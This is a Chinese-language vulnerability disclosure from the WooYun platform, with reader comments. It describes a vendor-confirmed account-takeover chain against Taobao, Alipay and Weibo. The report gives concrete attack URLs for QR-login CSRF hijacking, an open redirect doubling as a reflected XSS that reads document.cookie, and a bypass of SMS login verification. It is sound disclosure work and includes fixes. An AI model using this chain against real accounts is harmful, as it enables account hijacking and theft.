微博上点开我发的链接我就可登进你的淘宝支付宝和微博可盗号可挂马(poc中附若干从洞)

编号99486
Urlhttp://www.wooyun.org/bug.php?action=view&id=99486
漏洞状态厂商已经确认
漏洞标题微博上点开我发的链接我就可登进你的淘宝支付宝和微博可盗号可挂马(poc中附若干从洞)
漏洞类型设计缺陷/逻辑错误
厂商阿里巴巴
白帽子呆子不开口
提交日期2015-03-04 16:58:00
公开日期2015-04-24 13:40:00
修复时间(not set)
确认时间2015-03-05 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank20
漏洞简介
微博上点开我发的新闻,我就进了你的淘宝支付宝和微博,从此我就对你的人生多了几分了解。利用过程中还利用了两个其他漏洞,一个是跳转漏洞(也可以是绕过xss filter的反射xss),一个是异常登录短信或动态口令认证的绕过,就在这一并提交了
漏洞细节漏洞一、淘宝的二维码扫描登录功能存在劫持漏洞
用户登陆的二维码,格式如下:
http://ma.taobao.com/rl/ebc9d0e7d1af2fd18e7aee1ed1f8ebbd

用户用手机扫描后,会在登录状态下去访问一个请求来给此二维码的值授权,然后需要用户点击确认,然后完成授权。这时浏览器端的会用授权后的参数去服务端获取登陆凭证,然后来登陆
但是,扫描后的用户确认页无意义,因为最终的授权请求格式如下:
post: http://login.m.taobao.com/qrcodeLoginAuthor.do?qr_t=s
参数为shortURL,值为上面的二维码的值 http://ma.taobao.com/rl/ebc9d0e7d1af2fd18e7aee1ed1f8ebbd

这里面的所有参数都是可猜测的,未加token保护。攻击者可以把shortUR参数换成他的二维码中的shortUR,然后直接欺骗登录用户去点击完成授权
我们可以获取到最终的登陆凭证格式如下:
https://login.taobao.com/member/loginByIm.do?uid=cntaobaousername&token=0104de9b4363476712b9597780a70a00&time=1425148510364&asker=qrcodelogin&ask_version=1.0.0&defaulturl=http%3A%2F%2Fwww.taobao.com%2F&webpas=1b04fa6f6901df787ce9da8848d1a23d2121730000

经测试发现,不管是用户登陆的是web版还是移动端淘宝,都可对此请求完成授权
就是说,只要用户在登陆状态下,不管是电脑还是移动端,只要点了我的链接,我就能用它的身份登陆淘宝了
漏洞二、互联网的便捷扩大了危害
很多人的淘宝是未登陆状态的,而且我没法直接对话那么多登陆了淘宝的用户,所以看起来只能搞搞熟人或是买家卖家
怎样和跟多的淘宝用户互动呢?我扶了扶镜框,发现微博上很多用户都绑定了淘宝账号。而且,即使你没登陆淘宝,微博的某些功能可以帮你自动登陆淘宝
如果你绑定了淘宝,你在微博或客户端微博上访问
http://api.weibo.com/t_short_url?outUrl=http://www.taobao.com

浏览器会帮你自动登陆淘宝,所以思路就有了,让用户先自动登陆淘宝,再去访问我们的攻击请求
但由于此请求不让被iframe,所以我只能通过taobao.com域的跳转漏洞来让用户在登陆后再去访问我们的攻击请求
哪有跳转漏洞呢?我扶了扶镜框,果然发现了一个:
http://www.taobao.com/webww/redirect.htm?ssshttp://www.baidu.com?

当然,你看它的漏洞原理的话,它还可以是一个反射的xss,浏览器的xssfilter对它无效
漏洞出在js的跳转里,未对跳转目标进行校验
http://www.taobao.com/webww/redirect.htm?sssjavascript:alert(document.cookie);//

这样,只要在微博上发这样一个请求
http://api.weibo.com/t_short_url?outUrl=http://www.taobao.com/webww/redirect.htm?ssshttp://***********/tm.php?

用户点击后就相当于登陆了淘宝,又扫了我们的二维码了
漏洞三、绕过异常登录的短信认证或动态口令认证
我们拿到用户授权,去服务端获取完凭证后,用如下格式的链接去访问
https://login.taobao.com/member/loginByIm.do?uid=cntaobaousername&token=0104de9b4363476712b9597780a70a00&time=1425148510364&asker=qrcodelogin&ask_version=1.0.0&defaulturl=http%3A%2F%2Fwww.taobao.com%2F&webpas=1b04fa6f6901df787ce9da8848d1a23d2121730000

会发现,除了同城的一些用户,大部分用户的访问都被识别成异常登陆了,会弹出个短信或者动态口令认证
通过改IP等方式,可以偶尔绕过一些,但成功率不高
怎么才能完美绕过呢?我扶了扶镜框,发现了一个方法
在阿里旺旺里,也有个内嵌页面的自动登陆,格式如下:
http://login.taobao.com/member/loginByIm.do?_input_charset=utf-8&uid=cntaobaousernam&token=9d01ce33876e184b04d2ec03378fd134&act=SignIn&time=1425384138614&fromInnerIE=1&asker=AliIM&asker_version=8.00.43C&defaulturl=http%3a%2f%2fteam.taobao.com%2fphoneapp3%2fspread_and_home_page.htm%3fver%3d8.00.43C%26msgid%3d0%26uid%3dcntaobaousername%26cssname%3ddefault&webpas=cntaobaousernam---5494c4032a24c4e20c9ba758c889fe9d1523497202---

把我们的凭证里的几个主要参数,替换到这个请求中,也可以完成登陆,而且绕过了短信认证,我测试了,是100%的绕过
具体是哪个参数影响的,我没细看,应该是defaulturl和fromInnerIE此类的
四、登陆进淘宝后,可以直接访问支付宝,还可以直接自动登陆用户的微博
所以说账号打通后,只会降低双方的安全性。因为你们同时不出事的概率小了点
POC需要测试的poc可以联系我
证明的截图和视频如下:
其他用户的淘宝:
QQ20150301-1.png
短信认证
QQ20150301-2.png
绕过后
QQ20150301-3.png
QQ截图20150302151537.png
QQ截图20150302151708.png
屏幕快照 2015-03-03 02.41.01.png
屏幕快照 2015-03-03 02.41.41.png
视频如下,密码是238191

如果打不开视频,可以下载视频,地址如下
链接: http://pan.baidu.com/s/1qWnz6dm 密码: q9qm
修复方案1、扫描二维码后的确认请求,加token保护
2、js跳转需要校验目标
3、认证风控策略要统一,不要留一些弱策略的口子,不要有短板
状态信息 2015-03-04: 该漏洞正等待厂商内部评估
2015-03-05: 厂商已经确认,与白帽子共同解决该漏洞中,漏洞信息仅向厂商公开
2015-03-25: 细节向核心白帽子及相关领域专家公开
2015-04-04: 细节向普通白帽子公开
2015-04-14: 细节向实习白帽子公开
2015-04-24: 细节向公众公开
厂商回复漏洞已确认真实存在,并已安排人处理。
回应信息危害等级:高漏洞Rank:20 确认时间:2015-03-05 13:38
Showing 1-35 of 35 items.
评论内容评论人点赞数评论时间

我扶了扶镜框,然而什么也没发现

Stardustsky02015-08-24 09:47:00

我扶了扶镜框,发现我没戴眼镜。。。已瞎

一只猿02015-08-21 17:08:00

各种攻击

雏鹰02015-05-17 00:20:00

太厉害了!

cf_hb02015-05-05 21:23:00

请问你那眼镜哪买的? 我也要一个.

Lucaroot02015-05-05 19:24:00

扶了扶眼镜框

Yinkan02015-05-05 17:27:00

扶了扶眼镜框.

jeary02015-05-05 16:10:00

请问你那眼镜哪买的? 我也要一个.

wutoupal02015-05-04 23:01:00

请问你那眼镜哪买的? 我也要一个.

斯杰02015-04-25 19:13:00

请问你那眼镜哪买的? 我也要一个.

屠龙宝刀点击就送02015-04-25 18:29:00

请问你那眼镜哪买的? 我也要一个

Constantine02015-04-24 22:38:00

@夏殇 有趣的发现

疯狂的dabing02015-04-24 20:05:00

镜框威力好大..

Seven.Sea02015-04-24 19:43:00

为什么在http://www.wooyun.org/corps/阿里巴巴这里看不到这个洞

夏殇02015-04-24 19:28:00

请问你那眼镜哪买的? 我也要一个

夏殇02015-04-24 19:26:00

又一个SSO带来的问题。

todaro02015-04-24 16:19:00

请问你那眼镜哪买的? 我也要一个

圣路西法02015-04-24 15:44:00

到头来是token惹的祸?

Hxai1102015-04-24 15:36:00

请问你那眼镜哪买的? 我也要一个.

暗羽02015-04-24 15:19:00

你骗我,你的链接并没有女生拍裸照发到qq空间好看

redrain有节操02015-04-24 15:10:00

请问你那眼镜哪买的? 我也要一个.

紫藤居士02015-04-24 15:07:00

这么牛逼的 为啥没有放首页呢? 之前都没有看到啊 。。。

papaver02015-04-24 15:02:00

请问你那眼镜哪买的? 我也要一个.

0x33402015-04-24 15:00:00

请问你那眼镜哪买的? 我也要一个.

大亮02015-04-24 14:56:00

一环套一环

飘过的红花02015-04-24 14:47:00

请问你那眼镜哪买的? 我也要一个.

cnrstar02015-04-24 14:37:00

NB!

秋风02015-04-24 14:35:00

请问你那眼镜哪买的? 我也要一个.

我饿啦!!02015-04-24 14:16:00

健宇02015-04-24 14:14:00

看完了,牛逼!

Focusstart02015-04-24 14:11:00

先留个名

Noxxx02015-04-05 12:34:00

我竟然完整的看到了,908cd5d48bceba9af53303c13e6bc73d

he1renyagao02015-04-04 20:01:00

@呆子不开口 湿人你好。

zeracker02015-03-04 18:13:00

@疯狗 标题都被你们改了,我写的是从此对你的人生多了几分了解,多有诗意,你们的ceo审美太差,不配一个诗人

呆子不开口02015-03-04 17:22:00

好长的标题,好萌的漏洞

疯狗02015-03-04 17:18:00